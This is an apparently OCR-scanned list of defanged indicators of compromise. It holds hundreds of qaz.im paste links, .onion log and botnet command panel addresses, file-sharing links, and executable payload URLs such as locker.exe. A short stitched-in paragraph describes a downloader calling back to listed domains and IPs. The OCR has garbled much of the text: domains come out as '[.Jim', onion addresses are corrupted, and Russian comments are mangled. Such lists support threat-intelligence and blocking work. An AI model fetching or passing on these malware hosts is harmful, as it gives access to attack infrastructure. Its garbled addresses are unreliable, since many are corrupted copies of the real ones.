hxxp://qaz[.]im/index[.]php?a=delete &q=892451012 
hxxp://qaz[.Jim/load/B9rR6k/nZYeF2 
hxxp://qaz[.]im/index[.]php?a=delete &q=362327421 
hxxp://qaz[.]im/load/Y8K8is/tfGaF8 
hxxp://qaz[.]im/index[.]php?a=delete &q=883666550 
hxxp://prnt[.]sc/tqql8c 
hxxp://dylanengineeringservices[.]com/3[.]exe 
hxxp://prnt[.]sc/tqq6z6 a Tenepb Cnanuno Ha NOKaIbHON 
hxxp://prnt[.]sc/tqqcae 
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hxxp://qaz[.]im/load/ZbiA4y/dN3zza 
hxxp://qaz[.]im/index[.]php?a=delete &g=580509032 
hxxp://qaz[.]im/load/D262b7/bzdZRB 
hxxp://prnt[.]sc/ujkov! 
hxxp://qaz[.]im/load/bYdRke/ntF4SR 
hxxp://qaz[.]im/index[.]php?a=delete &q=1658176727 
hxxp://qaz[.]im/load/t8K7fE/f3Z783 
hxxp://qaz[.]im/index[.]php?a=delete &q=366531375 
hxxp://qaz[.]im/load/E3yaDd/N3Dy5Q 
hxxp://qaz[.]im/index[.]php?a=delete &q=265994529 
hxxp://qaz[. Jim/load/nSQQtk/GikKBi 
hxxp://qaz[.]im/index[.]php?a=delete &g=798241435 
hxxp://51[.]89[.]125[.]28 

hxxp://qaz[. ]im/load/2kNb95/ihSa82 
hxxp://qaz[.]im/index[.]php?a=delete &q=608394963 
hxxp://qaz[.]im/load/S6kK6h/HdA5Gn 
hxxp://qaz[.]im/index[.]php?a=delete &q=148151393 
hxxp://qaz[.]im/load/Y7z23H/fa9Dan 
hxxp://qaz[.]im/index[.]php?a=delete &q=2012887647 
hxxp://qaz[.]Jim/load/EFbsFH/KyhAnh 
hxxp://qaz[.]im/index[.]php?a=delete &q=235854272 
hxxp://qaz[.]im/load/an6yii/rbFR5E 
hxxp://qaz[.]im/index[.]php?a=delete &g=585028141 
hxxp://qaz[.]im/load/NRi9iy/aAaees 
hxxp://qaz[.]im/index[.]php?a=delete &q=282658768 
hxxp://qaz[. ]im/load/99sdHz/75RABK 
hxxp://qaz[.]im/index[.]php?a=delete &q=1152401783 
hxxp://qaz[.]im/load/D4KEzr/R5k2FK 
hxxp://qaz[.]im/index[.]php?a=delete &q=736352732 
hxxp://qaz[.]im/load/K3f6dn/dTZNEa 
hxxp://qaz[.]im/index[.]php?a=delete &q=408918317 
hxxp://qaz[.]im/load/3dD5aY/2GZASA 
hxxp://qaz[.]im/index[.]php?a=delete &q=423110529 
hxxp://qaz[.]im/load/tSH67z/EKQ9FD 
hxxp://qaz[.]im/index[.]php?a=delete &q=1398120872 
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hxxp://qaz[.]im/load/hSttYd/Df2Zsi 
hxxp://qaz[.Jim/index[.]php?a=delete &q=511915700 
hxxp://qaz[.]im/load/Ads298/kBQ5Gz 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1474187270 
hxxp://qaz[.Jim/load/HdnTn2/sEZDtt 
hxxp://qaz[.]im/index[.]php?a=delete &q=764950199 
hxxp://qaz[.]im/load/YGe9GG/952Rt9 
hxxp://qaz[.]im/index[.]php?a=delete &q=171148762 
hxxp://qaz[.Jim/load/b4iHNd/afdkdB 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1507541938 
hxxp://qaz[.]im/load/AtZebR/ZfT5Qe 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1979992415 
hxxp://qaz[.Jim/load/ztbz83/3fdQ24 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1308215949 
hxxp://qaz[.]im/load/N6Se9f/Ns6tkK6 
hxxp://qaz[.]im/index[.]php?a=delete &q=1474203354 
hxxp://qaz[.]im/load/FrQH4A/t4KhaY 
hxxp://qaz[.Jim/index[.]php?a=delete &q=202738616 
hxxp://qaz[.]im/load/eGr6B7/3ySabh 
hxxp://qaz[.]im/index[.]php?a=delete &q=1441403380 
hxxp://qaz[.]im/load/syAek5/QykR2e 
hxxp://qaz[.]im/index[.]php?a=delete &q=137638887 
hxxp://qaz[.]im/load/A7GAKQ/Rh5H8y 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2052446858 
hxxp://send[. ]firefox[.]com/download/4f9bf31b2dcfdf9f/ 
hxxp://send[. ]firefox[.]com/download/054f362fa0f90264/ 
hxxp://wwwl[.]sendspace[.]com/file/2velhd 
hxxp://qaz[.Jim/load/Afhk8f/Ez2r2h 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1972643086 
hxxp://qaz[.]im/load/G397eG/AYn2Ry 
hxxp://qaz[.]im/index[.]php?a=delete &q=1308998932 
hxxp://qaz[.]im/load/Ab3QsF/ZhAyki 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1800628064 
hxxp://qaz[.]Jim/load/FYSBKs/QTkaz9 
hxxp://qaz[.]im/index[.]php?a=delete &q=1850926906 
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hxxp://www[.]sendspace[.]com/file/yc4fs9 
hxxp://qaz[.]im/load/Dr3N3d/BtkK4sG 
hxxp://qaz[.]im/index[.]php?a=delete &q=1964192968 
hxxp://qaz[.]im/load/bsDAKR/B96KAt 
hxxp://qaz[.]im/index[.]php?a=delete &q=1331251747 
hxxp://www[.]sendspace[.]com/file/skyn5j 
hxxp://qaz[.]im/load/ZfzaAD/2rdDyh 
hxxp://qaz[.]im/index[.]php?a=delete &q=1054598910 
hxxp://qaz[.]lim/load/FRBhse/32DBBR 
hxxp://qaz[.]im/index[.]php?a=delete &q=1809245382 
hxxp://qaz[.]im/load/dB5fEh/ZtreR4 
hxxp://qaz[.]im/index[.]php?a=delete &q=1376686089 
hxxp://qaz[.]im/load/7 NBfTB/ER6RS4 
hxxp://qaz[.]im/index[.]php?a=delete &q=795260507 
hxxp://qaz[.]im/load/ANTtGk/iBAD69 
hxxp://qaz[.]im/load/4nkAKB/byrd3z 
hxxp://qaz[.]im/index[.]php?a=delete &q=2126164522 
hxxp://qaz[.]im/load/zirS3s/TNSKHb 
hxxp://qaz[.]im/index[.]php?a=delete &q=1178459297 
hxxp://qaz[.]im/load/fKYKSZ/eekSDD 
hxxp://qaz[.]im/index[.]php?a=delete &q=1808958131 
hxxp://qaz[.]im/load/EZ6Yf9/GR6hQ9 
hxxp://uibegvz4hxzrqjqc[.]onion/login Tak u He pabotaeT 
hxxp://173[.]232[.]146[.]236/phpvirtualbox/ npunerna 
hxxp://qaz[.]im/load/zRn2aA/ese66n 
hxxp://qaz[.]im/load/2dTbHD/G76KB7 
hxxp://qaz[.]im/index[.]php?a=delete &q=2040935925 
hxxp://uibegvz4hxzrqjqc[.]onion/log/544696476 
hxxp://uibegvz4hxzrqjqc[. lonion/log/544696239 
hxxp://privnote[.]com/rygPdZdj 
hxxp://uibegvz4hxzrqjqc[.]onion/log/545400806 
hxxp://uibegvz4hxzrqjqc[.]onion/log/545427332 
hxxp://uibegvz4hxzrqjqc[. lonion/log/552587603 
hxxp://uibegvz4hxzrqjqc[. lonion/log/553199630 
hxxp://dyncheck[.]com/scan/id/7d2b3db4cflbb1ldbdbe01e26e0dbe8dd 
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hxxp://uibegvz4hxzraqjqc[.]onion/log/556887374 
hxxp://uibegvz4hxzrajqc[. ]onion/log/556883245 
hxxp://uibegvz4hxzraqjqc[.]onion/log/562633763 
hxxp://uibegvz4hxzraqjqc[. ]onion/log/562642320 
hxxp://uibegvz4hxzraqjqc[.]onion/log/562649540 
hxxp://uibegvz4hxzraqjqc[.Jonion/log/568644222 
hxxp://uibegvz4hxzraqjqc[.]onion/log/568651787 
hxxp://uibegvz4hxzraqjqc[.]onion/log/570186991 
hxxp://uibegvz4hxzraqjqc[.]onion/log/570385264 


hxxp://ncdzrppa5xl3vw5 7|k6x3prcj5p63y3m46t4giq6rvdsa3woed3Bhicid[.]onion/c rpanel 


hxxp://kwwka7ark3ynr7k7[.]onion/log/26 
hxxp://kwwka7ark3ynr7k7[.]onion/log/31 
hxxp://kwwka7ark3ynr7k7[.]onion/log/35 
hxxp://uibegvz4hxzrqjqc[.]onion 
hxxp://uibegvz4hxzraqjqc[.]onion/log/425159373 
hxxp://qaz[.]Jim/load/tE8dS9/Hee2As 
hxxp://mk6gwg6mwnnGif33[.]Jonion 
hxxp://qaz[.]Jim/load/SZTdaR/2s9tfh 
hxxp://qaz[.Jim/load/rFYGG3/SkEEeG 
hxxp://mk6gwg6mwnnGif33[.]onion/projects 
hxxp://qaz[.]im/load/frRSdF/KKt5 HH 
hxxp://qaz[.]im/load/bYyAeb/FiHkad 
hxxp://qaz[.]im/load/FDGk4H/etBrTy 
hxxp://qaz[.]im/load/aByDhY/8sQhbB 
hxxp://qaz[.]Jim/load/66aZAB/9AE3st 
hxxp://qaz[.]Jim/load/9RH9T5/F888Nt 
hxxp://qaz[.]im/load/dtFGy2/sb4AST 
hxxp://qaz[.]im/load/NK9TDA/FEZ9GE 
hxxp://qaz[.]im/load/zZBdnhH/HR7RNk 
hxxp://qaz[.]im/load/RfD3hd/szBkK9 
hxxp://qaz[.]im/load/idh6nh/8RTzh9 
hxxp://qaz[.]im/load/EYaAa4/98h6s4 
hxxp://qaz[.]Jim/load/d3E3TH/fZZ5YY 
hxxp://qaz[.Jim/load/9hbyFe/BiDbst 
hxxp://qaz[.]im/load/K8E44A/83dG8B 
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hxxp://qaz[.]im/load/oN48se/NRya6b 

hxxp://qaz[.]im/load/QsFrFG/AHAKHF 7 BecuT B npoleccax HO B NaHesb HE yNeTaeT 
hxxp://qaz[.]im/load/B69Q6G/zdAREr 

hxxp://qaz[. ]im/load/kA9A5e/ZSsaFN 

hxxp://qaz[.]im/load/REBYFQ/S77R2G 

hxxp://qaz[.]lim/load/zzRRZF/SEQGBb 

hxxp://qaz[.]im/load/7Znyyy/NkAR3D 

hxxp://qaz[.]lim/load/raHKzZ/fN6zrQ 

hxxp://qaz[.]im/load/HBHZDG/AQfF46 

hxxp://drive[.]google[.]com/uc?export=download &id=1oXO0iCzszaqr8wx!lXdszwpYrqmFP6i81b 


hxxp://drive[.]google[.]com/uc?export=download &id=1MrVpreEF5Rccv7G- 
avQqwW2zFsl9QidY8 


hxxp://qaz[.]im/load/NHQrF7/yFbeAs 
hxxp://qaz[.]im/index[.]php?a=delete &q=1144255767 
hxxp://mk6gwg6mwnnGif33[.]onion/ 
hxxp://qaz[.]lim/load/Yh3kFe/3hGREB 
hxxp://qaz[.]im/index[.]php?a=delete &g=931701001 
hxxp://qaz[.]im/load/RBQ7Ns/zByyGT 
hxxp://qaz[.]im/index[.]php?a=delete &q=1202707909 
hxxp://qsohf4rg4nscdkun[.]Jonion 


hxxp://scrytnuuszglaugg[.]onion/bots/command?id=0300884966931661797565317 143608- 
584837231 


hxxp://www[.]sendspace[.]com/file/umth3u 
hxxp://www[.]sendspace[.]com/delete/umth3u/b23fbbc78bd464e73153d3efcl cdbb6b 
hxxp://www[.]sendspace[.]com/file/7qlfwd 

hxxp://www[.]sendspace[.]com/delete/7 qlfwd/30803c971925397749b8a619 4c8ea4ce 


hxxp://scrytnuuszglaugg[.]onion/bots/command?id=02743182763126349642408 
67392850956363946 


hxxp://prnt[.]sc/tloscO 

hxxp://prnt[.]sc/tlqmth 

hxxp://prnt[.]sc/tlqz40 

hxxp://www[.]sendspace[.]com/file/gOi6br 

hxxp://www[. ]sendspace[.]com/delete/g0i6br/86b2dd21908fb3d521cca381 ad0bal7b 
hxxp://qaz[.]im/load/d38Z8e/3hyEKe 

hxxp://qaz[.]im/index[.]php?a=delete &q=1437935297 


hxxp://scrytnuuszglaugg[.]onion/bots/command?id=017645276634813467941 - 
3026243782657174315 
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hxxp://qaz[.Jim/load/2An4zY/G4DnEN 
hxxp://qaz[.]im/index[.]php?a=delete &q=56925069 
hxxp://qaz[.]im/load/6QARQK/KaGhKz 
hxxp://qaz[.]im/index[.]php?a=delete &g=764561513 
hxxp://qaz[.Jim/load/hz2kba/TG87DR 
hxxp://qaz[.]im/index[.]php?a=delete &q=1396690309 
hxxp://qaz[.Jim/load/7TQr65/bEh2rb 
hxxp://qaz[.]im/index[.]php?a=delete &q=182416309 


hxxp://scrytnuuszglaugg[. ]onion/bots/command?id=0254733738409595577849 
552648620747426660 


hxxp://qaz[.]Jim/load/4aiF8h/54SKBA 
hxxp://qaz[.]im/index[.]php?a=delete &q=1281376591 
hxxp://qaz[.Jim/load/TSQYB2/eZdd9B 
hxxp://qaz[.]im/index[.]php?a=delete &q=1087595170 
hxxp://qaz[.]im/load/E5kGrh/R5ZhYN 
hxxp://qaz[.]im/index[.]php?a=delete &q=1562581155 
hxxp://qaz[.]im/load/e7DKtB/6yDsfF 
hxxp://qaz[.]im/index[.]php?a=delete &q=953404818 
hxxp://qaz[.]Jim/load/FTKzD6/SBeEBh 
hxxp://qaz[.]im/index[.]php?a=delete &q=77619406 
hxxp://qaz[.]im/load/SahGRe/HbAfh8 
hxxp://prnt[.]sc/ubIhn6x 
hxxp://qaz[.]im/load/fSn4DY/HfES3T 
hxxp://qaz[.]im/index[.]php?a=delete &q=1043169920 
hxxp://qaz[.]im/load/yEQ4eK/94ByHk 
hxxp://qaz[.]im/index[.]php?a=delete &q=1113634540 
hxxp://185[.]189[.]151[.]142 
hxxp://qaz[.]im/load/H8G483/8fb2Fh 
hxxp://qaz[.]im/index[.]php?a=delete &q=1941178798 
hxxp://qaz[.]im/load/aKT8QF/r8E27K 
hxxp://qaz[.]im/index[.]php?a=delete &q=836017225 
hxxp://qaz[.]im/load/b8EAhK/6yhiiy 
hxxp://qaz[.]im/load/FB6ZBD/aTEkn4 
hxxp://qaz[.]im/index[.]php?a=delete &q=1713191000 
hxxp://qaz[.]im/load/BbAQHr/St2Rh4 
hxxp://qaz[.]im/index[.]php?a=delete &q=1914638834 
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hxxp://qaz[.]lim/load/S672S6/nkrRiy 
hxxp://qaz[.]im/index[.]php?a=delete &q=1733231464 
hxxp://qaz[.]lim/load/YNfDEZ/BbFYQE 
hxxp://qaz[.]im/index[.]php?a=delete &q=2003528176 
hxxp://qaz[.]im/load/dr4GNb/9hBSNG 
hxxp://qaz[.]im/load/9Z9dh4/FaA944 
hxxp://qaz[.]im/load/63iSAB/ztDkFK 
hxxp://qaz[.]im/index[.]php?a=delete &q=1118690534 
hxxp://qaz[. ]Jim/load/GDEkFz/nkhSdk 
hxxp://qaz[.]im/index[.]php?a=delete &q=237326344 
hxxp://qaz[.]im/load/36aS3i/tr9r66 
hxxp://qaz[.]im/index[.]php?a=delete &q=1858000426 
hxxp://qaz[.]im/load/fhfESb/S4Q9Nz 
hxxp://qaz[.]im/index[.]php?a=delete &q=1620967045 
hxxp://qaz[.]im/load/YSD486/Q5NsDt 
hxxp://qaz[.]im/index[.]php?a=delete &q=978832109 
hxxp://qaz[.]im/load/ZT4fGD/dfYfHB 
hxxp://qaz[.]im/index[.]php?a=delete &q=362399943 
hxxp://qaz[.]lim/load/isDDtZ/TANBDz 
hxxp://qaz[.]im/index[.]php?a=delete &q=1689500986 
hxxp://qaz[.]im/load/zZQnBF7/rB8r8st 
hxxp://qaz[.]im/index[.]php?a=delete &q=1973971124 
hxxp://qaz[.]Jim/load/GEyGG8/tDHH2f 
hxxp://qaz[.]im/index[.]php?a=delete &q=1278168481 
hxxp://qaz[.]im/load/TH7yFS/zRkyhA 
hxxp://qaz[.]im/index[.]php?a=delete &q=1423012604 
hxxp://qaz[.]im/load/23KiD7/kyz5RR 
hxxp://qaz[.]im/index[.]php?a=delete &q=2019982298 
hxxp://qaz[.]lim/load/NRRebQ/HADnFT 
hxxp://qaz[.]im/index[.]php?a=delete &q=6851931 
hxxp://qaz[.]im/load/88aDrh/5R9977 
hxxp://qaz[.]im/index[.]php?a=delete &q=521302824 
hxxp://qaz[.]lim/load/4HfD7G/z5th3k 
hxxp://qaz[.]im/index[.]php?a=delete &q=1131771651 
hxxp://qaz[. ]im/load/95SSh8/Sz7d6k 
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The downloader then phones back to : 
dasgdasg .net (91.205.96.12) 
new-york-images .com (89.149.207.114) 
future-pictures .com (94.247.2.117) 
download-everything.com (69.46.16.99) 
archiveviewsoftware.com 


193.142.244.17 


Naturally, the people behind this malware campaign have centralized the rest of the ma- 
licious domains by parking them at the very same IPs used in the redirectors. The domains 
are pretty descriptive themselves, and it’s also worth pointing out that they intend to start 
introducing newly registered fake security software ones: 


[5]94.247.3.228 
files-upload-21 .com 
downloabsecureherel .com 
downloabsecurehere2 .com 
downloabsecurehere3 .com 
downloabsecurehere4 .com 
fast-download-base-free .com 
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hxxp://qaz[.]im/index[.]php?a=delete &q=578504008 
hxxp://qaz[.]im/load/ts9ynF/Krb4fd 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1873252928 
hxxp://qaz[.Jim/load/Z9NQ5R/8eF57B 
hxxp://qaz[.]im/load/7kZQNi/yN39ks 
hxxp://qaz[.]im/index[.]php?a=delete &q=1844306930 
hxxp://qaz[.]im/load/aEZ4h2/fZREQA 123 
hxxp://o54eavgyktxh5wts[.]onion/shop/?swoof=1 &country=de &paged=1 
hxxp://www[.]Jottenbourg[.]com/nagpsdo[.]exe 
hxxp://qaz[.Jim/load/R3SK22/bA244Y 
hxxp://qaz[.]im/index[.]php?a=delete &q=557653115 
hxxp://xtlw5nzrv7qenweepw65cczadna52rg2r6yk6wG6ifwegsscieaolz4qd[.Jonio n/crpanel/ 
hxxp://qaz[.]im/load/9DQi8r/8AbiI9A 
hxxp://qaz[.Jim/index[.]php?a=delete &q=579061928 
hxxp://qaz[.]im/load/a4i7HS/tQd648 
hxxp://qaz[.]im/index[.]php?a=delete &q=628892328 
hxxp://qaz[.]im/load/dbGNR6/t3Ashd 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2064944095 
hxxp://qaz[.Jim/load/5YT2Z6/E5DZRZ 
hxxp://qaz[.Jim/index[.]php?a=delete &q=51436726 
hxxp://qaz[.]im/load/6Zb4Y9/2eeFhe 
hxxp://send[. ]firefox[.]com/download/6f8aaf93b777d90f/ 
hxxp://qaz[.]im/load/bft3sN/A7nhfk 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2064137483 
hxxp://qaz[.]im/load/BhZQ2i/8Y6NfG 
hxxp://qaz[.]im/index[.]php?a=delete &q=1751767682 
hxxp://qaz[.]im/load/6k3h9e/5Ednei 
hxxp://send[. ]firefox[.]com/download/06859ada2d52e2e2/ 
hxxp://qaz[.Jim/load/aZsi7z/Sk4iZn 
hxxp://qaz[.Jim/index[.]php?a=delete &q=476520114 
hxxp://send[.]firefox[.]com/download/342487930cf875f0/ 
hxxp://send[. ]firefox[.]com/download/84319c623de9b8f8/ 
hxxp://37[.]1[.]209[.]181/2805/locker[.]exe 
hxxp://send[. ]firefox[.]com/download/8b38084760e3996d/ 
hxxp://send[. lfirefox[.]com/download/23778ea31d2e00e3/ 
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hxxp://privatlab[.]com/s/v/72Jp50onMn0Oh2RzgAZYVZ 
hxxp://send[.]firefox[.]com/download/b44e09534725a101/ 
hxxp://qaz[.]im/load/Nd9N75/STtHhT 
hxxp://qaz[.]im/index[.]php?a=delete &q=2010097105 
hxxp://qaz[.]lim/load/ZRszKf/sd3QEa 

hxxp://qaz[.]im/index[.]php?a=delete &q=579201175 
hxxp://aes[.]one/files/d/e0t/1u4lg8iu6deall0c4k13lei1q7/94290198d07d9e Oe/ 
hxxp://aes[.]one/files/r/e0t/2nk30219u2ivr173mghul33usb1bjwO2fvvfp19/ 
hxxp://send[. ]firefox[.]com/download/a7d4392fc95daff2/ 
hxxp://aes[.]one/files/d/e11/4iwtvf38crw2bmsm46j1lw1tbh/ddbce6f927101e10/ 
hxxp://aes[.]one/files/r/e11/1v7gl23lu4a3b3nbwerbjchnbl2fnjg6083mbnc/ 
hxxp://qaz[.]Jim/load/7NNtQ3/36yGeR 
hxxp://qaz[.]im/index[.]php?a=delete &q=731834251 

hxxp://send[. ]firefox[.]com/download/7d9694c8ebf121f5/ 
hxxp://send[.]firefox[.]com/download/b78f285cadef6922/ 
hxxp://send[.]firefox[.]com/download/f9d81e35643c5f33/ 
hxxp://send[.]firefox[.]com/download/4a68d293f5cabal7/ 
hxxp://qaz[.]im/load/ReshRT/NZihZ5 

hxxp://qaz[.]im/load/DzhZfz/AbDQKF6 
hxxp://qaz[.]im/index[.]php?a=delete &q=710764023 

hxxp://qaz[. ]im/load/EsZ5H6/KKeTr4 

hxxp://qaz[.]im/load/TBY9S6/dz74iN 

hxxp://qaz[.]im/index[.]php?a=delete &q=854167700 
hxxp://qaz[.]limindex[.]php 

hxxp://qaz[. ]im/load/ndS3Sk/bHS76y 
hxxp://qaz[.]im/index[.]php?a=delete &q=2010947747 
hxxp://www[.]sendspace[.]com/file/zsimpi 

hxxp://www[. ]sendspace[.]com/delete/zsimpi/ale398ffe0321cbedc45c51a29 laf4d5 
hxxp://qaz[. ]im/load/kYAs9S/THnG4t 
hxxp://qaz[.]im/index[.]php?a=delete &q=605715867 
hxxp://qaz[.]Jim/load/9r2kzh/9DGZhk 
hxxp://qaz[.]im/index[.]php?a=delete &q=986131509 
hxxp://qaz[.]im/load/yYSDG5/ydAQNz 
hxxp://qaz[.]im/index[.]php?a=delete &q=42655952 
hxxp://prntscr[.]com/tidc5a - oum6ka di2a[.]Jexe npu 3anycKke 
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hxxp://qaz[.]im/load/b5fdeF/ak68bF 
hxxp://qaz[.Jim/index[.]php?a=delete &q=475138700 
hxxp://qaz[.]im/load/eytbG8/n9naQB 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1167634977 
hxxp://qaz[.]im/load/YKFKBd/58dRKD 
hxxp://qaz[.Jim/index[.]php?a=delete &q=952374951 
hxxp://qaz[.Jim/load/s7i4Bs/2hAGz2 
hxxp://qaz[.]im/index[.]php?a=delete &q=850438448 
hxxp://qaz[.]im/load/btKrrZ/G5zTE3 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2056679470 
hxxp://qaz[.]im/load/K33QDe/EiQ39s 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1430588283 
hxxp://qaz[.]im/load/s6SZ64/KFQDtr 
hxxp://qaz[.]im/index[.]pohp?a=delete &q=1635171812 
hxxp://qaz[.]im/load/dzDKTh/54yFAG 
hxxp://qaz[.]im/index[.]php?a=delete &q=1194623706 
hxxp://qaz[.]im/load/SerB73/ArFfke 
hxxp://avcheck[.]net/id/5qnojv5hzsOq 
hxxp://qaz[.]Jim/load/4e65ys/TiT2Sf 
hxxp://qaz[.]im/index[.]php?a=delete &q=216233853 
hxxp://www[.]Jottenbourg[.]com/5[.]exe 
hxxp://qaz[.]im/load/hKHy7B/69beSK 
hxxp://qaz[.]im/load/EAE8ZF/SydkYH 
hxxp://megal[.]nz/file/O2xxAZaA 
hxxp://qaz[.]im/load/GE8ESK/KnAeDh 
hxxp://qaz[.]im/load/AQ3QdK/658bni 
hxxp://qaz[.]im/index[.]php?a=delete &q=1033123828 
hxxp://qaz[.]im/load/68TFKK/FQid3T 
hxxp://qaz[.]im/index[.]php?a=delete &q=801588501 
hxxp://prntscr[.]com/tugj04 
hxxp://prntscr[.]com/tuib88 
hxxp://qaz[.]im/load/yGGzkn/bn3zzD 
hxxp://qaz[.Jim/load/8r7ZAF/ZArER9 
hxxp://qaz[.]im/index[.]php?a=delete &q=759748662 
hxxp://qaz[.]im/load/edNyYh/DHEKb4 
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hxxp://dyncheck[.]com/scan/id/59b8f46346315e0aede593593c1lbec19 
hxxp://qaz[. ]im/load/8y5AEH/D9iIHYB 
hxxp://qaz[.]im/index[.]php?a=delete &q=303613506 
hxxp://qaz[.]im/load/kK4HDDT/dsHzD9 
hxxp://qaz[.]im/index[.]php?a=delete &q=1747484639 
hxxp://qaz[.]im/load/47GhRi/ARb5Ya 
hxxp://qaz[.]im/load/K2YGib/fydeaD 
hxxp://qaz[.]im/load/GHRi65/N44zZQF 
hxxp://qaz[.]lim/load/GraQza/Ae2yha 
hxxp://www[.]sendspace[.]com/file/lupbnc 
hxxp://www[.]sendspace[.]com/delete/lupbnc/82calcb2b3e5dfb77e714dd3 4bb5efc7 
hxxp://qaz[.]Jim/load/rE9tYB/ksnzN4 
hxxp://qaz[.]im/load/SNZ3ka/7nriKG 
hxxp://qaz[.]im/index[.]php?a=delete &q=53662270 
hxxp://qaz[.]im/load/sfRAbG/rkEGTy 
hxxp://qaz[.]im/load/ZEDDyh/hTHD6D 

hxxp://qaz[. ]im/load/4DFy4b/se9yEZ 
hxxp://qaz[.]im/load/KsD4rd/aQ35QH 
hxxp://qaz[.]im/load/tnbf5h/dNSad3 
hxxp://qaz[.]im/load/iN2r5e/Y39N8Z 
hxxp://qaz[.]im/load/shiDAzZ/hnHBAB 
hxxp://qaz[.]im/load/rke3RQ/YDSdRR 
hxxp://qaz[.]im/index[.]php?a=delete &q=1121522431 
hxxp://qaz[.]lim/load/ikK7 BR/EQnNdY 
hxxp://qaz[.]lim/load/7fZZKZ/rz7B92 
hxxp://qaz[.]im/index[.]php?a=delete &q=35205787 
hxxp://qaz[. ]im/load/Tr9trd/QKiyHT 
hxxp://qaz[.]im/index[.]php?a=delete &q=650718700 
hxxp://qaz[.]im/load/nn5Ba8/BdBnkk 
hxxp://qaz[.]lim/load/zKNe4N/e7N5DZ 

hxxp://qaz[. ]im/load/4yA8GB/4hds42 
hxxp://qaz[.]im/index[.]php?a=delete &q=1196553818 
hxxp://qaz[.]im/index[.]php?a=delete &q=1266194245 
hxxp://qaz[.]im/load/ryHiZG/HAS6GE 
hxxp://qaz[.]im/index[.]php?a=delete &q=1528529594 
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hxxp://qaz[.]im/load/AQNhB7/3rTBfG 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1873277145 
hxxp://qaz[.]Jim/load/E9Zb4r/a87Ghy 
hxxp://qaz[.]im/index[.]php?a=delete &q=2135122123 
hxxp://qaz[.]im/load/NYT6bi/bZhZY3 
hxxp://qaz[.]im/index[.]php?a=delete &q=288688592 
hxxp://qaz[.]im/load/z4hfKT/84Dnih 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1358801027 
hxxp://qaz[.]im/load/RYY43r/SRKR8F 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1049569560 
hxxp://qaz[.]im/load/ADAGdz/7snFd2 
hxxp://qaz[.Jim/index[.]php?a=delete &q=252805459 
hxxp://qaz[.]im/load/D3GD8Q/4D93i8 
hxxp://qaz[.]im/load/6EsiAz/aGehHf 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1685290428 
hxxp://qaz[.]im/load/atbRyr/FdQhbb 
hxxp://qaz[.]im/load/t23He7/fBFa4r 
hxxp://qaz[.]im/load/NbsR3h/GQNKhb 
hxxp://qaz[.Jim/load/sQdEBe/G73d2R 
hxxp://qaz[.]im/load/8DezGd/NQn6sZ 
hxxp://qaz[.]im/index[.]php?a=delete &q=1977716804 
hxxp://qaz[.]Jim/load/63YrfZ/6RbAS7 
hxxp://qaz[.Jim/index[.]php?a=delete &q=396188019 
hxxp://qaz[.]im/load/QBG7Yz/Fbfy9d 
hxxp://qaz[.]im/index[.]php?a=delete &q=477760692 
hxxp://qaz[.]im/load/K56Yk5/36t3D6 
hxxp://qaz[.]im/index[.]php?a=delete &q=1507928871 
hxxp://qaz[.Jim/load/TnA87Z/s7h3Dz 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1243206030 
hxxp://qaz[.]im/load/Q6SSBF/8f2BeH 
hxxp://qaz[.]im/load/B99nSB/TdH63i 

hxxp://privatlab[. ]net/s/v/XyxopkxXygqtj4aw05n4A 
hxxp://qaz[.]Jim/load/bF9eN4/TFK2ef 
hxxp://qaz[.Jim/load/RH3srk/FFkEzd 
hxxp://qaz[.]im/index[.]php?a=delete &q=187700677 
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hxxp://qaz[.]im/load/ZRZ88k/KGd9hd 
hxxp://qaz[.]im/index[.]php?a=delete &q=2036736330 
hxxp://qaz[.]im/load/B9GA5b/484D7d 
hxxp://qaz[.]im/index[.]php?a=delete &q=1930563773 
hxxp://qaz[.]im/load/ZD6T59/ibseBk 
hxxp://qaz[.]im/index[.]php?a=delete &q=1468090535 
hxxp://qaz[.]Jim/load/7aBZNE/HQtast 
hxxp://qaz[.]im/index[.]php?a=delete &q=308942585 
hxxp://qaz[.]im/load/2Bd7d6/n2FGT4 
hxxp://qaz[.]im/index[.]php?a=delete &q=1719868965 
hxxp://qaz[.]im/load/k4fNFK/4nHN6A 
hxxp://qaz[.]im/index[.]php?a=delete &q=400389325 
hxxp://qaz[.]im/load/D6ZAHZ/ftB2YH 
hxxp://qaz[.]im/load/Tbs5n6/s5b7A3 
hxxp://qaz[.]im/load/DBfZKi/DZt3Nr 
hxxp://qaz[.]im/index[.]php?a=delete &q=847889949 
hxxp://qaz[.]im/load/Et25Ys/3HYr7Q 
hxxp://qaz[.]im/index[.]php?a=delete &q=1118794965 
hxxp://qaz[.]im/load/FS3d44/SSrhY3 
hxxp://qaz[.]im/index[.]php?a=delete &q=1783735550 
hxxp://qaz[.]im/load/5Kronn/sZK6KY 
hxxp://qaz[.]im/index[.]php?a=delete &q=1406721832 
hxxp://qaz[.]im/load/FYSKSN/fFR6rT 
hxxp://qaz[.]im/index[.]php?a=delete &q=700066770 
hxxp://prnt[.]sc/u8tz4f 
hxxp://qaz[.]im/load/YeSNzk/FOBF2k 
hxxp://qaz[.]im/index[.]php?a=delete &q=1038331179 
hxxp://qaz[.]im/load/7 NS3b3/ZHbAFY 
hxxp://qaz[.]im/index[.]php?a=delete &q=199342761 
hxxp://qaz[.]im/load/kKHQnRr/Sk8ST5 
hxxp://qaz[.]im/load/aBr7fk/SSZHYN 
hxxp://qaz[.]im/load/NKeBR4/KRKDbE 
hxxp://qaz[.]im/index[.]php?a=delete &q=464923365 
hxxp://qaz[.]im/load/5s39kQ/SadYfG 
hxxp://qaz[.]im/index[.]php?a=delete &q=1776859872 
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hxxp://qaz[.]im/load/E6Q8ZS/DTyrNG 
